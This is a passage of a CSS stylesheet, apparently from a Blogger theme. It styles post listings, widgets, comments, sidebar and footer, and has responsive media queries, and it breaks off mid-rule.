.queryMessage .search-label,.queryMessage .search-query{font-weight:700;text-transform:uppercase}
.queryMessage .search-label:before,.queryMessage .search-query:before{content:"\201c"}
.queryMessage .search-label:after,.queryMessage .search-query:after{content:"\201d"}
.queryMessage a.show-more{float:right;color:$(title.hover);text-decoration:underline;transition:opacity .17s}
.queryMessage a.show-more:hover{opacity:.8}
.queryEmpty{font-size:13px;font-weight:400;padding:10px 0;margin:0 0 25px;text-align:center}



/*-- Custom-widget  CSS --*/

.footer-menu ul li{width:unset;display:inline-block}
.footer-menu ul li a{letter-spacing:.2px;height:70px;display:block;color:#000;font-size:13px;font-weight:500;line-height:70px;text-transform:capitalize;margin:0 0 0 15px;padding:0;transition:color .17s}

.title-wrap{position:relative;float:left;width:100%;height:32px;background-color:$(main.color);display:block;margin:0 0 20px}
.title-wrap>h3{position:relative;display:block;height:32px;font-size:12px;color:#fff;font-weight:500;line-height:32px;text-align:center;text-transform:uppercase;padding:0;margin:0}
.custom-widget li{overflow:hidden;margin:20px 0 0}
.custom-widget li:first-child{padding:0;margin:0;border:0}
.custom-widget .post-image-link{position:relative;width:100px;height:70px;float:left;overflow:hidden;display:block;vertical-align:middle;margin:0 12px 0 0}
.custom-widget .post-info{overflow:hidden}
.custom-widget .post-title{overflow:hidden;font-size:13px;font-weight:500;line-height:1.7em;margin:0 0 3px}
.custom-widget .post-title a{display:block;color:$(title.color);transition:color .17s}
.custom-widget li:hover .post-title a{color:$(title.hover)}
.index-post-wrap{position:relative;float:left;width:100%}
.blog-post{display:block;overflow:hidden;word-wrap:break-word}
.grid-posts{display:grid;grid-template-columns:repeat(2,1fr);grid-gap:0;margin:0 -15px}
h2.post-title{text-transform:capitalize;margin:0 0 8px}
.index-post{display:block;box-sizing:border-box;padding:0 15px;margin:0 0 25px}
.index-post .post-image-wrap{width:100%;height:269px;overflow:hidden;margin:0 15px 0 0}
.index-post .post-image-wrap .post-image-link{width:100%;height:100%;position:relative;display:block;z-index:1;overflow:hidden}
.post-tag{position:absolute;letter-spacing:.4px;bottom:0;left:0;z-index:5;background-color:#239795;color:#fff;font-size:12px;font-weight:500;text-transform:capitalize;padding:8px 11px}
.index-post .post-info{padding:20px 0;overflow:hidden}
.index-post .post-info>h2{font-size:22px;margin:0 0 10px;font-weight:400;line-height:1.4em;text-decoration:none}
.index-post .post-info>h2>a{display:block;color:$(title.color);transition:color .17s}
.index-post .post-info>h2:hover>a{color:$(title.hover)}
.widget iframe,.widget img{max-width:100%}
.date-header{display:block;overflow:hidden;font-weight:400;margin:0!important;padding:0}
.index-post .post-meta{margin:0 0 10px}
.post-snippet{text-align:justify;position:relative;display:none;overflow:hidden;font-size:16px;line-height:1.7em;font-weight:500;margin:0}
a.read-more{border-radius:3px;padding:8px 0;display:none;color:#333;font-size:13px;font-weight:500;text-transform:uppercase;margin:12px 0 0;transition:color .17s ease;border-radius:5px}
#featured-wrapper a.read-more{margin:15px 0 0;background-color:$(main.color);color:#fff;padding:8px}
a.read-more:after{content:'\f178';font-family:FontAwesome;font-weight:400;margin:0 0 0 5px}
a.read-more:hover{color:$(title.color)}
#breadcrumb{font-size:12px;font-weight:400;color:#aaa;margin:0 0 15px}
#breadcrumb a{color:#aaa;transition:color .17s}
#breadcrumb a:hover{color:$(title.hover)}
#breadcrumb a,#breadcrumb em{display:inline-block}
#breadcrumb .delimiter:after{content:'\f054';font-family:FontAwesome;font-size:8px;font-weight:400;font-style:normal;vertical-align:middle;margin:0 3px}
.item-post h1.post-title{color:$(title.color);font-size:27px;line-height:1.5em;font-weight:600;position:relative;display:block;margin:0 0 15px;padding:0}
.static_page .item-post h1.post-title{text-align:center;margin:0, border:0 auto}
.item-post .post-body{width:100%;font-size:15px;line-height:1.5em;overflow:hidden;padding:10px 0 0;margin:10px 0 0;border-top:1px solid #eee}
.item-post .post-outer{padding:0}
.item-post .post-body img{max-width:100%}
.main .widget{margin:0 auto}
.main .Blog{border-bottom-width:0}
.post-footer{position:relative;float:left;width:100%;margin:20px 0 0}
.inline-ad{position:relative;display:block;max-height:60px;margin:0 0 30px}
.inline-ad>ins{display:block!important;margin:0 auto!important}
.item .inline-ad{float:left;width:100%;margin:20px 0 0}
.item-post-wrap>.inline-ad{margin:0 0 20px}
.post-labels{overflow:hidden;height:auto;position:relative;margin:0 0 20px;padding:0}
.post-labels a,.post-labels span{float:left;height:22px;background-color:#f2f2f2;color:$(title.color);font-size:12px;line-height:22px;font-weight:400;margin:0;padding:0 10px}
.post-labels span{background-color:$(main.color);color:#fff}
.post-labels a{margin:0 0 0 5px;transition:all .17s ease}
.post-labels a:hover{background-color:$(main.color);color:#fff;border-color:$(main.color)}
.post-reactions{height:28px;display:block;margin:0 0 15px}
.post-reactions span{float:left;color:$(title.color);font-size:11px;line-height:25px;text-transform:uppercase;font-weight:500}
.reactions-inner{float:left;margin:0;height:28px}
.post-share{position:relative;overflow:hidden;line-height:0;margin:0 0 30px}
ul.share-links{position:relative}
.share-links li{width:70px;float:left;box-sizing:border-box;margin:0 5px 5px 0}
.share-links li a{float:left;display:inline-block;cursor:pointer;width:100%;height:32px;line-height:32px;color:#fff;font-weight:400;font-size:15px;text-align:center;box-sizing:border-box;opacity:1;transition:all .17s ease}
.share-links li a:hover{opacity:.8}
ul.post-nav{position:relative;overflow:hidden;display:block;margin:0 0 30px}
.post-nav li{display:inline-block;width:50%}
.post-nav .post-prev{float:left;text-align:left;box-sizing:border-box;padding:0 10px}
.post-nav .post-next{float:right;text-align:right;box-sizing:border-box;padding:0 10px}
.post-nav li a{color:$(title.color);line-height:1.4em;display:block;overflow:hidden;transition:color .17s}
.post-nav li:hover a{color:$(title.hover)}
.post-nav li span{display:block;font-size:11px;color:#aaa;font-weight:700;text-transform:uppercase;padding:0 0 2px}
.post-nav .post-prev span:before{content:"\f053";float:left;font-family:FontAwesome;font-size:10px;font-weight:400;text-transform:none;margin:0 2px 0 0}
.post-nav .post-next span:after{content:"\f054";float:right;font-family:FontAwesome;font-size:10px;font-weight:400;text-transform:none;margin:0 0 0 2px}
.post-nav p{font-size:12px;font-weight:400;line-height:1.4em;margin:0}
.post-nav .post-nav-active p{color:#aaa}
.about-author{position:relative;display:block;overflow:hidden;background-color:#f9f9f9;padding:20px;margin:0 0 30px}
.about-author .avatar-container{position:relative;float:left;width:80px;height:80px;background-color:rgba(255,255,255,.05);overflow:hidden;margin:0 15px 0 0}
.about-author .author-avatar{float:left;width:100%;height:100%}
.author-name{overflow:hidden;display:inline-block;font-size:12px;font-weight:500;text-transform:uppercase;line-height:14px;margin:7px 0 3px}
.author-name span{color:$(title.color)}
.author-name a{color:$(main.color);transition:opacity .17s}
.author-name a:hover{opacity:.8}
.author-description{display:block;overflow:hidden;font-size:12px;font-weight:400;line-height:1.6em}
.author-description a:hover{text-decoration:underline}
#related-wrap{overflow:hidden;margin:0 0 30px}
#related-wrap .related-tag{display:none}
.related-ready{float:left;width:100%}
.related-ready .loader{height:178px}
ul.related-posts{position:relative;overflow:hidden;margin:0 -10px;padding:0}
.related-posts .related-item{width:33.33333333%;position:relative;overflow:hidden;float:left;display:block;box-sizing:border-box;padding:0 10px;margin:0}
.related-posts .post-image-link{width:100%;height:130px;position:relative;overflow:hidden;display:block}
.related-posts .post-title{font-size:13px;font-weight:600;line-height:1.5em;display:block;margin:7px 0 5px}
.related-posts .post-title a{color:$(title.color);transition:color .17s}
.related-posts .related-item:hover .post-title a{color:$(title.hover)}



#blog-pager{float:left;width:100%;font-size:15px;font-weight:500;text-align:center;clear:both;box-sizing:border-box;padding:0;margin:45px 0}
#blog-pager .load-more{background: #000;display:inline-block;height:40px;font-size:14px;color: #fff!important;font-weight:400;line-height:40px;box-sizing:border-box;padding:0 100px;margin:0;border:1px solid rgba(0,0,0,.1);border-bottom-width:2px;border-radius:2px}
#blog-pager #load-more-link{color:#444;cursor:pointer}
#blog-pager #load-more-link:hover{background-color:$(main.color);color:#fff}
#blog-pager .load-more.no-more{color:$(main.color)}
#blog-pager .loading,#blog-pager .no-more{display:none}
#blog-pager .loading .loader{position:relative;height:100%;overflow:hidden;display:block;margin:0;height:34px}
#blog-pager .no-more.show{display:inline-block}
#blog-pager .loading .loader:after{width:26px;height:26px;margin:-15px 0 0 -15px;content:'';position:absolute;top:50%;left:50%;width:28px;height:28px;margin:-16px 0 0 -16px;border:2px solid $(main.color);border-right-color:rgba(155,155,155,0.2);border-radius:100%;animation:spinner 1.1s infinite linear;transform-origin:center}
@-webkit-keyframes spinner {
0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}
}
@keyframes spinner {
0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}
}
.archive #blog-pager,.home .blog-pager .blog-pager-newer-link,.home .blog-pager .blog-pager-older-link{display:none}
.post-animated{-webkit-animation-duration:.5s;animation-duration:.5s;-webkit-animation-fill-mode:both;animation-fill-mode:both}
@keyframes fadeIn {
from{opacity:0}
to{opacity:1}
}
.post-fadeIn{animation-name:fadeIn}
@keyframes fadeInUp {
from{opacity:0;transform:translate3d(0,5px,0)}
to{opacity:1;transform:translate3d(0,0,0)}
}
.post-fadeInUp{animation-name:fadeInUp}
.post-animated{-webkit-animation-duration:.5s;animation-duration:.5s;-webkit-animation-fill-mode:both;animation-fill-mode:both}
@keyframes fadeIn {
from{opacity:0}
to{opacity:1}
}
.post-fadeIn{animation-name:fadeIn}
@keyframes fadeInUp {
from{opacity:0;transform:translate3d(0,5px,0)}
to{opacity:1;transform:translate3d(0,0,0)}
}
.post-fadeInUp{animation-name:fadeInUp}
.blog-post-comments{display:none;margin:0 0 30px}
.blog-post-comments .comments-title{margin:0 0 20px}
.comments-system-disqus .comments-title,.comments-system-facebook .comments-title{margin:0}
#comments{margin:0}
#gpluscomments{float:left!important;width:100%!important;margin:0 0 25px!important}
#gpluscomments iframe{float:left!important;width:100%}
.comments{display:block;clear:both;margin:0;color:$(title.color)}
.comments .comment-thread > ol{padding:0}
.comments > h3{font-size:13px;font-weight:400;font-style:italic;padding-top:1px}
.comments .comments-content .comment{list-style:none;margin:0;padding:0 0 8px}
.comments .comments-content .comment:first-child{padding-top:0}
.facebook-tab,.fb_iframe_widget_fluid span,.fb_iframe_widget iframe{width:100%!important}
.comments .item-control{position:static}
.comments .avatar-image-container{float:left;overflow:hidden;position:absolute}
.comments .avatar-image-container,.comments .avatar-image-container img{height:35px;max-height:35px;width:35px;max-width:35px}
.comments .comment-block{overflow:hidden;padding:0 0 10px}
.comments .comment-block,.comments .comments-content .comment-replies{margin:0 0 0 50px}
.comments .comments-content .inline-thread{padding:0}
.comments .comment-actions{float:left;width:100%;position:relative;margin:0}
.comments .comments-content .comment-header{font-size:15px;display:block;overflow:hidden;clear:both;margin:0 0 3px;padding:0 0 5px;border-bottom:1px dashed #d6d6d6}
.comments .comments-content .comment-header a{color:$(title.color);transition:color .17s}
.comments .comments-content .comment-header a:hover{color:$(title.hover)}
.comments .comments-content .user{font-style:normal;font-weight:500;display:block}
.comments .comments-content .icon.blog-author{display:none}
.comments .comments-content .comment-content{float:left;font-size:13px;color:#5E5E5E;font-weight:400;text-align:left;line-height:1.4em;margin:5px 0 9px}
.comments .comment .comment-actions a{margin-right:5px;padding:2px 5px;color:$(title.color);font-weight:400;background-color:#f2f2f2;font-size:10px;transition:all .17s ease}
.comments .comment .comment-actions a:hover{color:#fff;background-color:$(main.color);border-color:$(main.color);text-decoration:none}
.comments .comments-content .datetime{float:left;font-size:11px;font-weight:400;color:#aaa;position:relative;padding:0 1px;margin:4px 0 0;display:block}
.comments .comments-content .datetime a,.comments .comments-content .datetime a:hover{color:#aaa}
.comments .thread-toggle{margin-bottom:4px}
.comments .thread-toggle .thread-arrow{height:7px;margin:0 3px 2px 0}
.comments .thread-count a,.comments .continue a{transition:opacity .17s}
.comments .thread-count a:hover,.comments .continue a:hover{opacity:.8}
.comments .thread-expanded{padding:5px 0 0}
.comments .thread-chrome.thread-collapsed{display:none}
.thread-arrow:before{content:'';font-family:FontAwesome;color:$(title.color);font-weight:400;margin:0 2px 0 0}
.comments .thread-expanded .thread-arrow:before{content:'\f0d7'}
.comments .thread-collapsed .thread-arrow:before{content:'\f0da'}
.comments .comments-content .comment-thread{margin:0}
.comments .continue a{padding:0 0 0 60px;font-weight:400}
.comments .comments-content .loadmore.loaded{margin:0;padding:0}
.comments .comment-replybox-thread{margin:0}
.comments .comments-content .loadmore,.comments .comments-content .loadmore.loaded{display:none}
#comment-editor{margin:0 0 20px}
 
.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{color:$(title.color);font-weight:700;margin:0 0 15px}
.post-body h1,.post-body h2{font-size:24px}
.post-body h3{font-size:21px}
.post-body h4{font-size:18px}
.post-body h5{font-size:16px}
.post-body h6{font-size:13px}
blockquote{font-style:italic;padding:10px;margin:0;border-left:4px solid $(main.color)}
blockquote:before,blockquote:after{display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;color:#aaa;line-height:1}
blockquote:before{content:'\f10d';margin:0 10px 0 0}
blockquote:after{content:'\f10e';margin:0 0 0 10px}
.widget .post-body ul,.widget .post-body ol{line-height:1.5;font-weight:400}
.widget .post-body li{margin:5px 0;padding:0;line-height:1.5}
.post-body ul{padding:0 0 0 20px}
.post-body ul li:before{content:"\f105";font-family:FontAwesome;font-size:13px;font-weight:400;margin:0 5px 0 0}
.post-body u{text-decoration:underline}
.post-body a{transition:color .17s ease}
.post-body strike{text-decoration:line-through}
.contact-form{overflow:hidden}
.contact-form .widget-title{display:none}
.contact-form .contact-form-name{width:calc(50% - 5px)}
.contact-form .contact-form-email{width:calc(50% - 5px);float:right}
.sidebar .widget{position:relative;overflow:hidden;background-color:#f1f1f1;box-sizing:border-box;padding:15px;margin:0 0 25px;box-sizing:border-box;border:1px solid #e9e9e9}
.sidebar .widget:last-child{margin:0}
#social-widget .widget,#sidebar1 .widget:last-child{margin-bottom:25px}
.sidebar .widget-title{position:relative;float:left;width:100%;height:33px;display:block;margin:0 0 15px}
.sidebar .widget-title > h3{position:relative;display:block;height:33px;font-size:18px;color:#000;font-weight:500;line-height:33px;text-align:left;text-transform:capitalize;padding:0;margin:0;border-radius:2px 2px 0 0}
.sidebar .widget-content{float:left;width:100%;margin:0}
ul.social-counter{margin:0 -5px}
.social-counter li{float:left;width:25%;box-sizing:border-box;padding:0 5px;margin:10px 0 0}
.social-counter li:nth-child(1),.social-counter li:nth-child(2),.social-counter li:nth-child(3),.social-counter li:nth-child(4){margin-top:0}
.social-counter li a{display:block;height:40px;font-size:22px;color:#fff;text-align:center;line-height:40px;border:1px solid #eee;transition:color .17s}
.social-counter li a:hover{color:$(title.color)}
.list-label li{position:relative;display:block;padding:7px 0;border-top:1px dotted #000}
.list-label li:first-child{padding-top:0;border-top:0}
.list-label li:last-child{padding-bottom:0;border-bottom:0}
.list-label li a{display:block;color:$(title.color);font-size:13px;font-weight:500;text-transform:capitalize;transition:color .17s}
.list-label li a:hover{color:$(title.hover)}
.list-label .label-count{position:relative;float:right;width:16px;height:16px;background-color:$(main.color);color:#fff;font-size:11px;font-weight:400;text-align:center;line-height:16px}
.cloud-label li{position:relative;float:left;margin:0 5px 5px 0}
.cloud-label li a{display:block;height:26px;color:$(main.color);font-size:12px;line-height:26px;font-weight:400;padding:0 10px;border:1px solid #eee;transition:all .17s ease}
.cloud-label li a:hover{color:#fff;background-color:$(main.color);border-color:$(main.color)}
.cloud-label .label-count{display:none}
.sidebar .FollowByEmail > .widget-title > h3{margin:0}
.FollowByEmail .widget-content{position:relative;overflow:hidden;background-color:#fff;text-align:center;font-weight:400;box-sizing:border-box;padding:20px;border-radius:2px;border:1px solid #eee}
.FollowByEmail .widget-content > h3{font-size:18px;color:$(title.color);font-weight:500;text-transform:uppercase;margin:0 0 13px}
.FollowByEmail .before-text{font-size:13px;line-height:1.5em;margin:0 0 15px;display:block;padding:0 10px;overflow:hidden}
.FollowByEmail .widget-content:after{content:'\f0e0';position:absolute;right:-15px;top:-15px;font-family:FontAwesome;font-size:50px;color:$(main.color);opacity:.5;transform:rotate(21deg)}
.FollowByEmail .follow-by-email-inner{position:relative}
.FollowByEmail .follow-by-email-inner .follow-by-email-address{width:100%;height:32px;color:$(title.color);font-size:11px;font-family:inherit;padding:0 10px;margin:0 0 10px;box-sizing:border-box;border:1px solid #eee;transition:ease .17s}
.FollowByEmail .follow-by-email-inner .follow-by-email-submit{width:100%;height:32px;font-family:inherit;font-size:11px;color:#fff;background-color:$(main.color);text-transform:uppercase;text-align:center;font-weight:500;cursor:pointer;margin:0;border:0;transition:opacity .17s ease}
.FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover{opacity:.85}
#ArchiveList ul.flat li{color:$(title.color);font-size:13px;font-weight:400;padding:7px 0;border-bottom:1px dotted #eaeaea}
#ArchiveList ul.flat li:first-child{padding-top:0}
#ArchiveList ul.flat li:last-child{padding-bottom:0;border-bottom:0}
#ArchiveList .flat li > a{display:block;color:$(title.color);transition:color .17s}
#ArchiveList .flat li > a:hover{color:$(title.hover)}
#ArchiveList .flat li > a:before{content:"\f054";float:left;color:#161619;font-weight:400;font-family:FontAwesome;font-size:6px;margin:6px 3px 0 0;display:inline-block;transition:color .17s}
#ArchiveList .flat li > a > span{position:relative;float:right;width:16px;height:16px;background-color:$(main.color);color:#fff;font-size:11px;font-weight:400;text-align:center;line-height:16px}
.PopularPosts .post{overflow:hidden;margin:20px 0 0}
.PopularPosts .post:first-child{padding:0;margin:0;border:0}
.PopularPosts .post-image-link{position:relative;width:100px;height:80px;float:left;overflow:hidden;display:block;vertical-align:middle;margin:0 12px 0 0}
.PopularPosts .post-tag{display:none}
.PopularPosts .post-info{overflow:hidden}
.PopularPosts .post-title{text-transform:capitalize;font-size:14px;font-weight:500;line-height:1.5em;margin:0 0 3px}
.PopularPosts .post-title a{display:block;color:$(title.color);transition:color .17s}
text-transform: capitalize;
.PopularPosts .post:hover .post-title a{color:$(title.hover)}
.PopularPosts .post-date:before{font-size:10px}
.Text{font-size:13px}
.contact-form-widget form{font-weight:400}
.contact-form-name{float:left;width:100%;height:30px;font-family:inherit;font-size:13px;line-height:30px;box-sizing:border-box;padding:5px 10px;margin:0 0 10px;border:1px solid #ebebeb;border-radius:2px}
.contact-form-email{float:left;width:100%;height:30px;font-family:inherit;font-size:13px;line-height:30px;box-sizing:border-box;padding:5px 10px;margin:0 0 10px;border:1px solid #ebebeb;border-radius:2px}
.contact-form-email-message{float:left;width:100%;font-family:inherit;font-size:13px;box-sizing:border-box;padding:5px 10px;margin:0 0 10px;border:1px solid #ebebeb;border-radius:2px}
.contact-form-button-submit{float:left;width:100%;height:30px;background-color:$(main.color);font-size:13px;color:#fff;line-height:30px;cursor:pointer;box-sizing:border-box;padding:0 10px;margin:0;border:0;border-radius:2px;transition:background .17s ease}
.contact-form-button-submit:hover{background-color:$(main.dark.color)}
.contact-form-error-message-with-border{float:left;width:100%;background-color:#fbe5e5;font-size:11px;text-align:center;line-height:11px;padding:3px 0;margin:10px 0;box-sizing:border-box;border:1px solid #fc6262}
.contact-form-success-message-with-border{float:left;width:100%;background-color:#eaf6ff;font-size:11px;text-align:center;line-height:11px;padding:3px 0;margin:10px 0;box-sizing:border-box;border:1px solid #5ab6f9}
.contact-form-cross{margin:0 0 0 3px}
.contact-form-error-message,.contact-form-success-message{margin:0}
.BlogSearch .search-input{float:left;width:75%;height:30px;background-color:#fff;font-weight:400;font-size:13px;line-height:30px;box-sizing:border-box;padding:5px 10px;border:1px solid #ebebeb;border-right-width:0;border-radius:2px 0 0 2px}
.BlogSearch .search-action{float:right;width:25%;height:30px;font-family:inherit;font-size:13px;line-height:30px;cursor:pointer;box-sizing:border-box;background-color:$(main.color);color:#fff;padding:0 5px;border:0;border-radius:0 2px 2px 0;transition:background .17s ease}
.BlogSearch .search-action:hover{}
.Profile .profile-img{float:left;width:80px;height:80px;margin:0 15px 0 0;transition:all .17s ease}
.Profile .profile-datablock{margin:0}
.Profile .profile-data .g-profile{display:block;font-size:18px;color:$(title.color);font-weight:700;margin:0 0 5px;transition:color .17s ease}
.Profile .profile-data .g-profile:hover{color:$(title.hover)}
.Profile .profile-info > .profile-link{color:$(title.color);font-size:11px;margin:5px 0 0;transition:color .17s ease}
.Profile .profile-info > .profile-link:hover{color:$(title.hover)}
.Profile .profile-datablock .profile-textblock{display:none}
.common-widget .LinkList ul li,.common-widget .PageList ul li{width:calc(50% - 5px);padding:7px 0 0}
.common-widget .LinkList ul li:nth-child(odd),.common-widget .PageList ul li:nth-child(odd){float:left}
.common-widget .LinkList ul li:nth-child(even),.common-widget .PageList ul li:nth-child(even){float:right}
.common-widget .LinkList ul li a,.common-widget .PageList ul li a{display:block;color:$(title.color);font-size:13px;font-weight:400;transition:color .17s ease}
.common-widget .LinkList ul li a:hover,.common-widget .PageList ul li a:hover{color:$(title.hover)}
.common-widget .LinkList ul li:first-child,.common-widget .LinkList ul li:nth-child(2),.common-widget .PageList ul li:first-child,.common-widget .PageList ul li:nth-child(2){padding:0}
#footer-wrapper{padding-top:30px;background-color:rgba(23,79,78,.88);backdrop-filter:blur(16px);-webkit-backdrop-filter:blur(16px)}
.item #footer-wrapper{padding-top:0}
#footer-wrapper .container{position:relative;overflow:hidden;margin:0 auto;padding:0}
.footer-widgets-wrap{text-align:center;display:grid;grid-template-columns:repeat(1,1fr)}
.item .footer-widgets-wrap{display:none}
#footer-wrapper .footer{margin-bottom:25px;display:inline-block;float:left;width:100%;box-sizing:border-box;padding:0 15px}
#footer-wrapper .footer .widget{float:left;width:100%;padding:0;margin:25px 0 0}
#footer-wrapper .footer .Text{margin:10px 0 0}
#footer-wrapper .footer .widget:first-child{margin:0}
.footer .widget > .widget-title > h3{position:relative;color:$(headerfooter.color);font-size:15px;line-height:14px;font-weight:500;text-transform:uppercase;margin:0 0 25px}
.footer .custom-widget .post-title a,.footer .PopularPosts .post-title a,.footer .FeaturedPost .post-title a,.footer .LinkList ul li a,.footer .PageList ul li a,.footer .Profile .profile-data .g-profile,.footer .Profile .profile-info > .profile-link{color:$(footer.color)}
.footer .custom-widget .post-title a:hover,.footer .PopularPosts .post-title a:hover,.footer .FeaturedPost .post-title a:hover,.footer .LinkList ul li a:hover,.footer .PageList ul li a:hover,.footer .Profile .profile-data .g-profile:hover,.footer .Profile .profile-info > .profile-link:hover{color:$(title.hover)}
.footer .no-posts{color:$(footer.color)}
.footer .post-meta{color:#aaa}
.footer .FollowByEmail .widget-content > h3{color:$(footer.color)}
.footer .FollowByEmail .widget-content{background-color:rgba(255,255,255,0.05);border-color:rgba(255,255,255,0.05)}
.footer .FollowByEmail .before-text,#footer-wrapper .footer .Text{color:#aaa}
.footer .FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover{background:$(main.dark.color)}
.footer .FollowByEmail .follow-by-email-inner .follow-by-email-address{background-color:rgba(255,255,255,0.05);color:$(footer.color);border-color:rgba(255,255,255,0.05)}
.footer #ArchiveList .flat li > a{color:$(footer.color)}
.footer .list-label li,.footer .BlogArchive #ArchiveList ul.flat li{border-color:rgba(255,255,255,0.05)}
.footer .list-label li:first-child{padding-top:0}
.footer .list-label li a,.footer .list-label li a:before,.footer #ArchiveList .flat li > a,.footer #ArchiveList .flat li > a:before{color:$(footer.color)}
.footer .list-label li > a:hover,.footer #ArchiveList .flat li > a:hover{color:$(title.hover)}
.footer .list-label .label-count,.footer #ArchiveList .flat li > a > span{background-color:rgba(255,255,255,0.05);color:$(footer.color)}
.footer .cloud-label li a{border-color:rgba(255,255,255,0.05);color:$(footer.color)}
.footer .cloud-label li a:hover{background-color:$(main.color);color:#fff}
.footer .BlogSearch .search-input{background-color:rgba(255,255,255,0.05);color:$(footer.color);border-color:rgba(255,255,255,0.05)}
.footer .contact-form-name,.footer .contact-form-email,.footer .contact-form-email-message{background-color:rgba(255,255,255,0.05);color:$(footer.color);border-color:rgba(255,255,255,0.05)}
.footer .BlogSearch .search-action:hover,.footer .FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover,.footer .contact-form-button-submit:hover{background-color:rgba(0,0,0,0.3)}
#sub-footer-wrapper{color:$(footer.color);display:block;padding:0;width:100%;overflow:hidden}
#sub-footer-wrapper .container{text-align:center;overflow:hidden;margin:0 auto;padding:10px 0}
#sub-footer-wrapper .copyright-area{font-size:2px;display:inline-block;height:34px;line-height:34px;text-align:center;text-transform:uppercase;font-weight:500}
#sub-footer-wrapper .copyright-area a{color:$(main.color);transition:color .17s}
.hidden-widgets{display:none;visibility:hidden}
.back-top{display:none;z-index:1010;width:32px;height:32px;position:fixed;bottom:25px;right:25px;cursor:pointer;overflow:hidden;font-size:13px;color:#fff;text-align:center;line-height:32px}
.back-top:before{content:'';position:absolute;top:0;left:0;right:0;bottom:0;background-color:$(main.color);opacity:.5;transition:opacity .17s ease}
.back-top:after{content:'\f077';position:relative;font-family:FontAwesome;font-weight:400;opacity:.8;transition:opacity .17s ease}
.back-top:hover:before,.back-top:hover:after,.nav-active .back-top:after,.nav-active .back-top:before{opacity:1}
.sidebar .widget,.common-widget .widget,.PopularPosts .post,.FollowByEmail .widget-content,.BlogSearch .widget-content,.item-post .post-outer,.queryMessage,.blog-post-comments{background:rgba(255,255,255,.66);border:1px solid rgba(255,255,255,.55);border-radius:8px;box-shadow:0 12px 30px rgba(17,76,75,.09);backdrop-filter:blur(14px);-webkit-backdrop-filter:blur(14px)}
.sidebar .widget,.common-widget .widget{padding:18px;box-sizing:border-box}
.BlogSearch .search-input,.FollowByEmail .follow-by-email-inner .follow-by-email-address,.contact-form-name,.contact-form-email,.contact-form-email-message{background:rgba(255,255,255,.74);border-color:rgba(35,151,149,.22);border-radius:6px}
.BlogSearch .search-action,.FollowByEmail .follow-by-email-inner .follow-by-email-submit,.contact-form-button-submit,.load-more{border-radius:6px;box-shadow:0 8px 20px rgba(35,151,149,.18)}
.post-image-link,.post-thumb{border-radius:8px}
.top-bar-social ul>li>a,.main-menu ul li a{backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px)}
.error404 #main-wrapper{width:100%!important;margin:0!important}
.error404 #sidebar-wrapper{display:none}
.errorWrap{color:$(title.color);text-align:center;padding:80px 0 100px}
.errorWrap h3{font-size:160px;line-height:1;margin:0 0 30px}
.errorWrap h4{font-size:25px;margin:0 0 20px}
.errorWrap p{margin:0 0 10px}
.errorWrap a{display:block;color:$(main.color);padding:10px 0 0}
.errorWrap a i{font-size:20px}
.errorWrap a:hover{text-decoration:underline}

 @media screen and (max-width: 1100px) {

.archive #top-bar .container{
width:100%!important;
}
.error_page #top-bar .container{
width:100%!important;
}

.slide-menu-toggle{
color:#fff!important;
}
.fold-shadow-right{
display:none;
}

.grid-posts{
grid-template-columns: repeat(2,1fr);
}
#combo-up{
position: static!important;
width: 100%!important;
}
#combo-down {
    position: relative;
 width: 100%!important;
}
#main-menu ul>li>a{
    position: relative;
    color: #fff;
    font-size: 14px;
    font-weight: 500;
    text-transform: uppercase;
    line-height: 90px;
    display: inline-block;
    margin: 0;
    padding: 0 10px;
    transition: color .17s ease;
}
.header-menu {
    float: right;
    box-sizing: border-box;
    padding: 0 20px;
    background-color: unset;
}
#top-bar {
    padding: 0 20px;
    box-sizing: border-box;
}
#hot-wrapper .row {
width:100%;
    padding: 0 20px;
    box-sizing: border-box;
}
.header-header .container.row{
         width:100% 
    }
#header-wrap .container.row{
         width:100% 
    }

     #outer-wrapper{
         max-width:100% 
    }
     .row{
         box-sizing: border-box;
         padding: 0px 20px;
         width:100% 
    }
     #featured-post .row {
         width:100%;
    }
     .FeaturedPost .post-info{
         width:100%;
    }
     #top-bar .container{
         width:100%;
         box-sizing:border-box;
         padding:0 20px 
    }
     #hot-wrapper{
         box-sizing:border-box;
         padding:0 0px 
    }
     #header-wrap{
         height:auto 
    }
     .header-header{
         height:auto;
         box-sizing:border-box;
         padding:25px 20px 
    }
     .header-logo{
         max-width:30%; 
    }
     .header-ads{
         max-width:100% 
    }
     #content-wrapper{
         width:100%;
         position:relative;
         box-sizing:border-box;
    }
     #footer-wrapper .container{
         width:100%;
         box-sizing:border-box;
         padding:30px 20px 
    }
     #sub-footer-wrapper .container{
         box-sizing:border-box;
         padding:10px 20px 
    }
}
 @media screen and (max-width: 980px) {
     #content-wrapper > .container{
         margin:0 
    }
     .header-logo{
         max-width:100%;
         text-align:center;
         padding:7px 0 
    }
     .header-logo .header-image-wrapper{
         display:inline-block 
    }
     #main-menu{
         display:none!important; 
    }
.header-menu {
   
}
.overlay {
    display: block;
}
.nav-active .overlay {
    visibility: visible;
    opacity: 1;
}
     .slide-menu-toggle,.mobile-menu{
         display:block!important;
    }
.slide-menu-toggle:before{
background:none!important;
}
     #header-wrap{
         padding:0 
    }
     .header-header{
         background-color:#fff;
         padding:0 
    }
     #header-wrap .header-header {
    padding: 20px;
}
     .header-ads{
         width:100%;
         max-width:100%;
         box-sizing:border-box;
    }
     .header-ads .widget .widget-content{
         position:relative;
         padding:15px 0 15px;
         margin:0 auto 
    }
     #header-inner a{
         display:inline-block!important 
    }
     #main-wrapper,#sidebar-wrapper{
         width:100%;
         padding:0 
    }
     .item #sidebar-wrapper{
         margin-top:20px 
    }
}
 @media screen and (max-width: 880px) {

#top-bar {
}
.post-snippet{
font-size:14px!important;
}
.item .slide-menu-toggle,.arcieve .slide-menu-toggle,.error_page .slide-menu-toggle{
display:block!important;
}

#combo-up{
    position: unset;
    width: 100%;
    box-sizing: border-box;
    float: none;
}
#combo-down{
   position: position;
    width: 100%;
    box-sizing: border-box;
}
.slide-menu-toggle{
    display: block;
    position: absolute;
    line-height: 65px!important;
